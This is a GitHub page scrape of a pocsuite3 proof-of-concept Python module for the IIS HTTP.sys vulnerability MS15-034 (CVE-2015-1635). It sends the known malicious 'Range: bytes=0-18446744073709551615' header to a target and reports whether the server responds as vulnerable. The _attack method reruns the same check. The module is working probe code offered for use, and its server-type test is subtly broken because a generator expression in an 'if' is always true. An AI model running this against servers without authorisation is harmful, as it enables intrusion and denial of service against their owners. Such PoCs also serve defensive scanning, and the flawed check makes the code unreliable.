This repository has been archived by the owner on Aug 7, 2022. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 96
/
Copy pathiis-ms15-034_7_rce.py
88 lines (78 loc) · 2.95 KB
/
iis-ms15-034_7_rce.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
#!/usr/bin/env python
# coding: utf-8
from urllib.parse import urlparse
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE
class TestPOC(POCBase):
vulID = '0'
version = '1.0'
author = 'hancool'
vulDate = '2019-1-8'
createDate = '2019-1-8'
updateDate = '2019-1-8'
references = ['', ]
name = 'The IIS Vul (CVE-2015-1635,MS15-034)Check'
appPowerLink = 'https://docs.microsoft.com/en-us/security-updates/securitybulletins/2015/ms15-034'
appName = 'IIS'
appVersion = '7.0'
vulType = VUL_TYPE.CODE_EXECUTION
category = POC_CATEGORY.EXPLOITS.REMOTE
desc = '''
MS15-034 HTTP.sys DoS And Possible Remote Code Execution.
HTTP.sys Remote Code Execute.
'''
def _verify(self):
def check(url):
Server_Tag = ['Microsoft-HTTP', 'Microsoft-IIS']
try:
Request_Tmp = req.get(url)
remote_server = Request_Tmp.headers['server']
if (tmp_tag in remote_server for tmp_tag in Server_Tag):
return test_ms15_034(url)
else:
return (False, 'Web Service Is Not IIS\n[+] May Be ' + remote_server)
except req.exceptions.ConnectTimeout:
return (False, 'timeout')
except Exception as e:
# raise
return (False, '{}'.format(str(e)))
def test_ms15_034(url):
Req_headers = {'Host': 'stuff',
'Range': 'bytes=0-18446744073709551615'}
Request = req.get(url, headers=Req_headers)
if b'Requested Range Not Satisfiable' in Request.content:
return (True, Request.content)
elif b'The request has an invalid header name' in Request.content:
return (False, 'The vulnerability has been fixed!')
else:
return (False, 'The IIS service was unable to display the vulnerability exists, the need for manual testing!')
result = {}
pr = urlparse(self.url)
if pr.port: # and pr.port not in ports:
ports = [pr.port]
else:
ports = [80]
for port in ports:
try:
url = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
status, msg = check(url)
if status:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = '{}:{}'.format(
pr.hostname, port)
break
except:
pass
return self.parse_output(result)
def _attack(self):
return self._verify()
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('not vulnerability')
return output
register_poc(TestPOC)